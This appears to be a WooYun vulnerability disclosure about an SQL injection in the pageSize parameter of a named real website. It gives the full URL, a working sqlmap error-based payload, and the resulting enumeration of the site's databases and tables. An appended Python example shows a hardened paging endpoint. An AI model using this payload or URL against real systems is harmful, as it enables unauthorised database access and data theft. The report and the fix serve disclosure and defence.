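2015-07-09: Details reported to the vendor; awaiting vendor handling
2015-07-09: Vendor confirmed; details disclosed to the vendor only
2015-07-19: Details disclosed to core white hats and experts in the relevant field
2015-07-29: Details disclosed to regular white hats
2015-08-08: Details disclosed to intern white hats
2015-08-23: Details disclosed to the public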
Welcome to WooYun!
http://www.2144.cn/girls/ajaxGetFalls/?byMonth=0&cid=1&page=1&pageSize=1&t=0.09775325423106551
Parameter: pageSize
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pageSize (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: byMonth=0&cid=1&page=1&pageSize=1 PROCEDURE ANALYSE(EXTRACTVALUE(2485,CONCAT(0x5c,0x71787a6271,(SELECT (CASE WHEN (2485=2485) THEN 1 ELSE 0 END)),0x717a717071)),1)&t=0.09775325423106551
---
back-end DBMS: MySQL 5.1
current user: '[email protected].%'
current user is DBA: False
available databases [3]:
[*] app_2144_cn
[*] information_schema
[*] test

Database: app_2144_cn
[61 tables]
+-------------------+
| c_user            |
| c_vote_log        |
| c_vote_log_0      |
| c_vote_log_1      |
| c_vote_log_10     |
| c_vote_log_11     |
| c_vote_log_12     |
| c_vote_log_13     |
| c_vote_log_14     |
| c_vote_log_15     |
| c_vote_log_2      |
| c_vote_log_3      |
| c_vote_log_4      |
| c_vote_log_5      |
| c_vote_log_6      |
| c_vote_log_7      |
| c_vote_log_8      |
| c_vote_log_9      |
| c_vote_options    |
| c_vote_question   |
| feedback          |
| flash_flash       |
| flash_girl        |
| flash_girls_new   |
| girls_nav         |
| keyword           |
| keywordview       |
| link_category     |
| link_element      |
| migration         |
| t_admin           |
| t_category        |
| t_comment         |
| t_comment_0       |
| t_comment_1       |
| t_comment_2       |
| t_comment_3       |
| t_comment_4       |
| t_comment_5       |
| t_comment_6       |
| t_comment_7       |
| t_comment_8       |
| t_comment_9       |
| t_comment_a       |
| t_comment_b       |
| t_comment_c       |
| t_comment_d       |
| t_comment_e       |
| t_comment_f       |
| t_comment_new     |
| t_comment_newbk   |
| t_comment_operate |
| t_flower_switch   |
| t_log             |
| t_operate         |
| t_photo           |
| t_photo_cache     |
| t_photo_cache_bak |
| t_photo_girl      |
| t_session         |
| t_stat            |
+-------------------+
Should access permissions be set on this interface?
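
A hardened form of a paging endpoint like the one reported above, as an added example that is not part of the original report or the vendor's code. It assumes `pageSize` was concatenated into the tail of a SELECT (a `LIMIT` clause, which is where MySQL 5.x allows a trailing `PROCEDURE` clause); the `photo` table, `MAX_PAGE_SIZE` and all function names are hypothetical, and SQLite stands in for MySQL so the block runs offline.

```python
import sqlite3

MAX_PAGE_SIZE = 50  # assumed upper bound; the report does not state one


def _uint(params, name, default):
    """Accept only a short run of ASCII digits; anything else is an error."""
    raw = params.get(name, default)
    # Rejects signs, spaces, hex, Unicode digits and trailing SQL such as
    # "1 PROCEDURE ANALYSE(...)" before the value gets near a query.
    if not (raw.isascii() and raw.isdigit()) or len(raw) > 6:
        raise ValueError(f"{name} must be a plain decimal integer")
    return int(raw)


def parse_paging(params):
    """Return (page, page_size) clamped to sane bounds."""
    page = max(_uint(params, "page", "1"), 1)
    page_size = min(max(_uint(params, "pageSize", "1"), 1), MAX_PAGE_SIZE)
    return page, page_size


def fetch_photos(conn, params):
    """Paging values are validated, then bound as parameters, never formatted in."""
    page, page_size = parse_paging(params)
    cid = _uint(params, "cid", "0")
    cur = conn.execute(
        "SELECT id, title FROM photo WHERE cid = ? ORDER BY id LIMIT ? OFFSET ?",
        (cid, page_size, (page - 1) * page_size),
    )
    return cur.fetchall()


def demo_db():
    """Constructed in-memory table standing in for the real (unknown) schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photo (id INTEGER PRIMARY KEY, cid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO photo (cid, title) VALUES (?, ?)",
        [(1, f"photo-{i}") for i in range(1, 8)],
    )
    return conn
```
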
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-07-09 11:07
Thank you very much for supporting the security work of 2144 Game Network!
None yet